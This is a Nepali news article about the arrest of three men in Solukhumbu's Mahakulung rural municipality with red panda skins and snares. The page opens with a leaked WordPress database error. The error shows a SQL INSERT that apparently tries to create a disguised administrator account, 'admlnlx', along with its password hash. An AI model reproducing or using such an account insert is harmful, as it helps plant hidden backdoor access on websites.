WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bnpo2I3Uu/unIRMWDd3G8S81LFaRj10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:58:48', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लाको महाकुलुङ गाँउपालिकाबाट रेडपाण्डाको छाला सहित तीन जना पक्राउ परेका छन् । सात वटा रेडपाण्डाको छाला र पाँच वटा पासो सहित उनीहरुलाई सोमबार साँझ प्रहरी निरीक्षक मन्दिप चौहानको टोलीले घरैबाट पक्राउ गरेको सोलुखुम्बु प्रहरीले जनाएको छ ।
पक्राउ पर्नेहरुमा महाकुलुङ गाउँपालिका–२ का ७६ बर्षीय जगत बहादुर राई, सोही गाउँपालिका वडा नम्बर–३ का ५६ वर्षीय कविर शंकर राई र ५७ वर्षीय मितुरधन राई रहेका छन् । उनीहरुलाई बिहिबार सल्लेरीमा आयोजीत पत्रकार सम्मेलन मार्फत सार्वजनिक गरिएको हो ।
मकालु बरुण राष्ट्रिय निकुञ्ज मध्यवर्ती क्षेत्र बफरजोन भित्र गैह्रकानुनी रुपमा वन्यजन्तुको चोरी शिकारी गरि मार्ने, आखेटोपहार लुकाई छिपाई राखी खरिद बिक्री गर्ने तथा ओसार पसार गर्ने गरेको सूचनाको आधारमा पक्राउ गरिएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुका प्रहरी प्रमुख प्रहरी नायव उपरीक्षक कवित कटुवालले जानकारी दिए । अनुशन्धानको लागि पक्राउ गरि जिल्ला प्रहरी कार्यालय ल्याइएका तीनै जनालाई थप कार्वाहीका निम्ती राष्ट्रिय निकुञ्ज पठाउने कटुवालले बताए ।
राष्ट्रिय निकुञ्ज तथा वन्यजन्तु संरक्षण ऐन २०२९ को दफा २६ को १ अनुसार निजहरुलाई रु.५ लाख देखि रु. १० लाख सम्म जरिवाना वा पाँच वर्ष देखि १५ वर्ष सम्म कैद सजाय या दुवै हुन सक्ने कानुनी प्रावधान रहेको छ ।